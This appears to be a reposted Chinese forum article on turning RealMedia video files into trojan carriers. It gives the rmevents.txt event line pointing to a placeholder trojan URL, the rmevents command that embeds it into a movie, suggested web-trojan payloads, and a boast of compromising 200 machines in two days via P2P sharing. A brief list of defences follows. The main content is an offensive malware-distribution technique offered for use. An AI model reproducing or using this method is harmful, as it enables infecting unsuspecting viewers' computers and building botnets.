漏洞研究

关注公众号 jb51net

关闭
首页 > 实用技巧 > 漏洞研究 >

并不神奇的Real影片木马

作者:

并不神奇的Real影片木马
文章作者:intruder 
信息来源:邪恶八进制 中国 
如转载请注明出处 
     在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,我放了一个这样的小木马,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。 

    使用Helix Producer Plus 9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口. 
  新建一个文本文件rmevents.txt. 
  输入: 
u 00:01:00.0 00:01:30.0 http://www.muma.com.cn/muma.html 
  我来解释一下,它意思是说在00:01:00.0 00:01:30.0这个时间范围内打开后面的URL,后面的URL就是我们的木马地址。 
  输入rmevents -i 电影.rm -e rmevents.txt -o 电影1.rm 这个命令,生成的电影.rm就是我们的木马文件了。 
  http://www.muma.com.cn/muma.html这个地址是你做好的网页木马的地址,不管是动鲨木马啊,还是EXE2BMP的木马,还是什么CHM木马,还是我崇拜的冰狐大哥的IFRAME溢出的网页木马都可以。主要是新,威力强。 

  大家可以试一下。呵呵,intruder原创。本文允许转载,如转载请注明出处,谢谢。  


  唉。看来公布这个的危害还是不小地,嘿嘿,就当替我们党打击色情业了。 

  防御方法:一,最重要的一点,嘿嘿,别看不健康的东西,对身体不好哦。二,换别的播放器,我推荐梦幻鼎点播放器,贼好用啊。三,看片时用防火墙屏蔽RealPlayer对网络的访问,但这样做在线看的时候就没保险了。四,最最重要的一点,打完所有的IE补丁。五,如果不怕麻烦,在看影片之前我们可以执行我们做木马的那一步,只是把rmevents.txt的内容清空再做,这样就清空了影片的剪辑信息了。 
阅读全文